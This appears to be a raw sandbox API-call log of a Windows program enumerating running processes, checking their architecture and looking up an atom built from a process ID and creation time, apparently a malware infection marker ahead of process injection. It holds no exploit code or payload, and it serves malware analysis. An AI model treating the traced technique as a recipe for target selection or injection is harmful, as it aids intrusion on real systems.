	[0075.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0075.626] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.626] CloseHandle (hObject=0x224) returned 1
	[0075.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0075.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0075.626] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.626] CloseHandle (hObject=0x224) returned 1
	[0075.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e770, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0075.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0075.626] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.626] CloseHandle (hObject=0x224) returned 1
	[0075.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7289b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0075.627] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.627] CloseHandle (hObject=0x224) returned 1
	[0075.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0075.627] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.627] CloseHandle (hObject=0x224) returned 1
	[0075.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0075.627] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.627] CloseHandle (hObject=0x224) returned 1
	[0075.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7288f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0075.627] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.627] CloseHandle (hObject=0x224) returned 1
	[0075.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0075.627] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.627] CloseHandle (hObject=0x224) returned 1
	[0075.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0075.628] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.628] CloseHandle (hObject=0x224) returned 1
	[0075.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0075.628] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.628] CloseHandle (hObject=0x224) returned 1
	[0075.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0075.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0075.628] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.628] CloseHandle (hObject=0x224) returned 1
	[0075.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0075.628] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.628] CloseHandle (hObject=0x224) returned 1
	[0075.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0075.628] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.628] CloseHandle (hObject=0x224) returned 1
	[0075.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0075.629] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.629] CloseHandle (hObject=0x224) returned 1
	[0075.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0075.629] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.629] CloseHandle (hObject=0x224) returned 1
	[0075.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0075.629] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.629] CloseHandle (hObject=0x224) returned 1
	[0075.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72eb08, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0075.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0075.629] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.629] CloseHandle (hObject=0x224) returned 1
	[0075.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0075.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.630] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.630] CloseHandle (hObject=0x224) returned 1
	[0075.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.630] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.631] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0075.631] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.631] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.632] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetLastError () returned 0x5
	[0075.633] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.633] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0075.633] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.633] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0075.633] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0075.634] CloseHandle (hObject=0x224) returned 1
	[0075.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0075.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0075.634] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.634] CloseHandle (hObject=0x224) returned 1
	[0075.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e888, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0075.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0075.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0075.634] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.634] CloseHandle (hObject=0x224) returned 1
	[0075.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16c28) returned 0xc0000004
	[0075.693] VirtualAlloc (lpAddress=0x0, dwSize=0x16d28, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0075.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16d28, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0075.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0075.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0075.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0075.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0075.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0075.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0075.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0075.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0075.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0075.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0075.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0075.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc50, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0075.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0075.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0075.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0075.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0075.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0075.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0075.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0075.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
